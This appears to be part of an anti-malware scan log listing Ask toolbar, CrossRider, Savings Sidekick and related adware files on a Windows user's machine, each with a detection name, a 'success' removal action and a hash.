<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.4.1.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.6.0.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.6.3.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.9.1.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Config\Config.31.9.3.0-4.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Response\Response.31.28.0.0-11.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Response\Response.31.28.0.0-12.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\ProgramData\AskPartnerNetwork\Toolbar\AVIRA-V7\Updater\Response\Response.31.28.0.0-13.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>25b4841d8a019b9be4220f5f0cf6e11f</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcLdr.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcLdr_x64.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrv.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrvStub.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrvStub_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrv_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>07d2fca59af1a39330d7a6c8946e4eb2</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\ChromeUtils\APNNativeMsgHost.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\ChromeUtils\com.apn.native_messaging_host_aaaaacalgebmfelllfiaoknifldpngjh.json</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\APNSetup.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\searchhook.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ServiceLocator.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\SO.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\toolbar.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Toolbar.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\ToolbarPS.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\toolbar_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\UpdateManager.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Passport.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Passport_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.15.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1031.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1033.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1034.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1036.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1040.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1041.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1043.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1045.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\1049.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\2070.mst</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.10.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.10.3_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.15.5_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.16.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.16.2_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.17.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.18.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.19.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.2.2_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.21.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.24.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.27.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.28.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.29.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.33.2_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.34.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.35.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.36.1_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.37.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\AskToolbarInstaller-12.6.0_AVIRA-V7.msi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\appdata\Mozilla\Firefox\Profiles\{DefaultProfilesFolder}\extensions\toolbar_AVIRA-V7@apn.ask.com.xpi</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}\CRX\ToolbarCR.crx</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}\CRX\Update.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\common appdata\AskPartnerNetwork\Toolbar\{PartnerID}\CRX\{Crx_Version}\Toolbar.crx</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\ChromeUtils\APNNativeMsgHost.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\ChromeUtils\com.apn.native_messaging_host_aaaaacalgebmfelllfiaoknifldpngjh.json</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\apnmcp.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\searchhook.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\ServiceLocator.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\SO.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\toolbar.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Toolbar.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\ToolbarPS.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\toolbar_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\UpdateManager.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\ask-search.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\tbnhlpr.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\tbnhlpr_x64.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcLdr.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcLdr_x64.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrv.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrvStub.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrvStub_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\IDC\IdcSrv_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\Updater\{PartnerID}\config.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\{PartnerID}\Passport.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\AskPartnerNetwork\Toolbar\{PartnerID}\Passport_x64.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\VNT\content.zip</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\VNT\vntldr.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\AVIRA-V7\Source\program files\VNT\vntsrv.dll</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\ask-search.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\tbnhlpr_x64.exe</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Program Files (x86)\AskPartnerNetwork\Toolbar\Updater\AVIRA-V7\config.xml</path><vendor>PUP.Optional.APNToolBar.Gen</vendor><action>success</action><hash>a336a001464561d5db2d5f0f738f24dc</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_dhdepfaagokllfmhfbcfmocaeigmoebo_0\3</path><vendor>PUP.Optional.CrossRider</vendor><action>success</action><hash>c316831efc8f63d312b9bcbb39c935cb</hash></file>
<file><path>C:\ProgramData\IBUpdaterService\repository.xml</path><vendor>PUP.Optional.IBUpdater</vendor><action>success</action><hash>e1f8dac7b5d693a34c60434041c155ab</hash></file>
<file><path>C:\Users\Steffen\AppData\Local\Savings Sidekick\Chrome\Savings Sidekick.crx</path><vendor>PUP.Optional.SavingsSidekick</vendor><action>success</action><hash>0fca7f2268238babe4eef19d79898f71</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msibce28ce1-de58-4733-a851-4d1cd6713d3a.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb15bf5dfd-faf4-4491-9d71-86663138bb14.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stbbac11473-596e-4ae7-b1c8-5294837545d7.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi0638b358-c8ed-49b4-9f7f-a21f08886813.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi0d62bb70-7850-46f8-86ca-1d9581568377.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi25a55f36-bcb0-430d-8eda-b997849590a7.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi4aa3d77f-e11f-4e98-8cbf-b024a8d3eb3f.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi4dafba7c-d96c-4c6d-a54f-373e1c28761f.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi4fecd345-76b2-4f83-87a5-af3be2711f47.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi5ffa07b2-04d9-4925-b59e-8efe30c7c6c1.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi68b906e9-1b13-4c1a-9306-d4093db8e821.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi694d544d-7c64-4e4e-93e0-58d0643ff76c.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msi806f1a63-a56f-4676-bcae-cbb5060d1fcd.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Msia7e907a0-994e-47e2-9236-296bec675fcf.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb25a55f36-bcb0-430d-8eda-b997849590a7.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb4aa3d77f-e11f-4e98-8cbf-b024a8d3eb3f.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb4dafba7c-d96c-4c6d-a54f-373e1c28761f.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
<file><path>C:\Windows\Temp\APN-Stub\AVIRA-V7\Stb4fecd345-76b2-4f83-87a5-af3be2711f47.log</path><vendor>PUP.Optional.ASK.Gen</vendor><action>success</action><hash>b920069bbdce1521a6bfbeddbb475ca4</hash></file>
